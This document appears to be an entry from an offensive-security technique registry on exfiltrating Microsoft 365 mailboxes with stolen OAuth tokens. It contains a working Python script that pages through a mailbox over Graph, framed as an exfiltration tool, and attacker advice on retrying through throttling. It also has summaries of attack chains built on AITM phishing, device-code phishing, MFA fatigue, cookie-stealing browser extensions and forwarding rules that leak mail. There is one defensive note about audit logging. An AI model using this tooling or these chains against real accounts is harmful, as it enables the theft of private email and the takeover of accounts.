Exchange Web Services (EWS) Exfil
Use a stolen OAuth access token to query EWS or Microsoft Graph and pull entire mailboxes. Because the traffic is plain API calls rather than an Outlook client session, it bypasses many DLP controls that only instrument Outlook.
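The Graph side of the technique, as an added example that is not part of the registry entry: page through a mailbox with a bearer token by following `@odata.nextLink` until it disappears, then do a quick per-sender triage of what came back. The endpoint shape (`/me/messages`, `/users/{id}/messages`, `$top`, `$select`, `@odata.nextLink`) is Graph's; the token value and the two sample pages served by `fake_fetch` are constructed so the paging logic runs offline. An EWS equivalent sends the same bearer token to `/EWS/Exchange.asmx` with SOAP `FindItem`/`GetItem` requests, which is not shown here.

```python
"""Pull an entire mailbox over Microsoft Graph with a bearer token.

Added example (not the registry's code). Assumes the operator already holds an
OAuth access token carrying Mail.Read (delegated) or Mail.Read (application).
The sample pages below are constructed for the offline demo.
"""
import json
import urllib.request
from typing import Callable, Dict, List, Optional

GRAPH = "https://graph.microsoft.com/v1.0"
# $select trims each item to the fields worth exfiltrating first.
SELECT = "id,subject,from,toRecipients,receivedDateTime,bodyPreview,hasAttachments"


def graph_get(url: str, token: str) -> Dict:
    """One authenticated GET against Graph; returns the parsed JSON body."""
    req = urllib.request.Request(
        url, headers={"Authorization": f"Bearer {token}", "Accept": "application/json"}
    )
    with urllib.request.urlopen(req, timeout=30) as resp:
        return json.load(resp)


def dump_mailbox(token: str, user: Optional[str] = None, top: int = 100,
                 fetch: Callable[[str, str], Dict] = graph_get) -> List[Dict]:
    """Walk every page of a mailbox via @odata.nextLink.

    user=None uses /me (delegated token); a UPN or object id uses /users/{id}
    (application token). `fetch` is injectable so the paging logic can be
    exercised without network access.
    """
    base = f"{GRAPH}/me" if user is None else f"{GRAPH}/users/{user}"
    url = f"{base}/messages?$top={top}&$select={SELECT}"
    messages: List[Dict] = []
    while url:
        page = fetch(url, token)
        messages.extend(page.get("value", []))
        # Graph hands back a fully formed nextLink until the last page, where
        # the key is simply absent; that absence ends the loop.
        url = page.get("@odata.nextLink")
    return messages


def summarise(messages: List[Dict]) -> Dict[str, int]:
    """Per-sender message counts: a first triage of what was pulled."""
    counts: Dict[str, int] = {}
    for m in messages:
        sender = m.get("from", {}).get("emailAddress", {}).get("address", "<none>")
        counts[sender] = counts.get(sender, 0) + 1
    return counts


# ---- constructed sample pages for the offline demo -------------------------
_PAGES = {
    f"{GRAPH}/me/messages?$top=2&$select={SELECT}": {
        "value": [
            {"id": "AAMk1", "subject": "Q3 invoice", "hasAttachments": True,
             "from": {"emailAddress": {"address": "ap@vendor.example"}}},
            {"id": "AAMk2", "subject": "Re: Q3 invoice", "hasAttachments": False,
             "from": {"emailAddress": {"address": "cfo@corp.example"}}},
        ],
        "@odata.nextLink": f"{GRAPH}/me/messages?$top=2&$select={SELECT}&$skip=2",
    },
    f"{GRAPH}/me/messages?$top=2&$select={SELECT}&$skip=2": {
        "value": [
            {"id": "AAMk3", "subject": "Wire instructions", "hasAttachments": True,
             "from": {"emailAddress": {"address": "ap@vendor.example"}}},
        ],
    },
}


def fake_fetch(url: str, token: str) -> Dict:
    """Stand-in for graph_get that serves the constructed pages above."""
    return _PAGES[url]


if __name__ == "__main__":
    msgs = dump_mailbox("ACCESS_TOKEN_PLACEHOLDER", top=2, fetch=fake_fetch)
    print(len(msgs), "messages;", summarise(msgs))
```

Two practitioner notes. On the offensive side, Graph throttles bulk reads with HTTP 429 and a `Retry-After` header, so a real run needs a sleep-and-retry around `graph_get`. On the defensive side, this access pattern is not invisible: each read is logged by Purview audit as a `MailItemsAccessed` record (`MailAccessType` of `Bind` for item reads or `Sync` for folder syncs) carrying the OAuth client's `AppId`, which is the field to pivot on when hunting for an unfamiliar application pulling a whole mailbox.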
§ Where this technique fits
M365-EWS-EXFIL is catalogued under the Collection tactic of the offensive-security kill-chain. It appears in 8 approved dossiers in the registry, at step 5.1 on average.
§ Dossiers chaining this technique
- step 2 / 6
Compromised vendor mailbox → reply-chain phishing → client compromise
Take over a vendor / partner mailbox via AITM phishing. Reply to an existing thread with a malicious link — trust transferred from the genuine prior conversation defeats most user training.
- step 4 / 4
Mailbox forwarding rule → silent data exfil
Starting from a compromised user account, create an Inbox rule (or, with Exchange admin rights, a transport rule) that auto-forwards every incoming message to an external attacker mailbox; it stays invisible until an admin reviews mailbox rules.
- step 5 / 6
OAuth device-code phishing → M365 access without a fake page
Initiate a device-code flow against login.microsoftonline.com; send the code and URL to the victim via email or chat. Once they enter it, the attacker receives access and refresh tokens. The code is only valid for 15 minutes, so the lure has to land promptly.
- step 6 / 6
FIDO2 caBLE hybrid → phone authenticator hijack
Attacker phishing site shows the legitimate FIDO2 QR. Victim scans with their phone authenticator. The link completes the WebAuthn ceremony in the attacker's browser — they're now signed in as the victim.
- step 6 / 6
Slack token in CI log → DM history → vendor mailbox compromise
A CI run echoed a Slack xoxb-/xoxp- token. Use it to read DMs, harvest password-reset links and vendor invitations, pivot into the corporate mailbox.
- step 6 / 6
Malicious browser extension → cookie harvest → ATO
Publish a useful-looking extension (ad-blocker / PDF reader). It quietly reads cookies + localStorage from sensitive sites and ships them to the attacker.
- step 6 / 6
MFA fatigue / prompt-bombing → M365 admin compromise
Attacker has the password (from breach / spray) but not MFA. Spam push approvals at 2 AM until the user taps yes out of habit — used in the Uber and 0ktapus breaches.
- step 6 / 7
AITM phishing (Evilginx) → M365 session theft → mailbox exfil
Reverse-proxy phishing kit intercepts the entire login flow including MFA. Stolen session cookie → access M365 mailbox / SharePoint without retriggering auth.
§ What commonly comes next
- AAD Token Cache Exfil (M365-TOKEN-EXFIL, Credential Access), seen 1×
- Conversation Hijacking / Reply-Chain Attack (EM-CONVERSATION-HIJACK, Initial Access), seen 1×
- Mailbox Forwarding Rule (M365-MAILBOX-FORWARD, Collection), seen 1×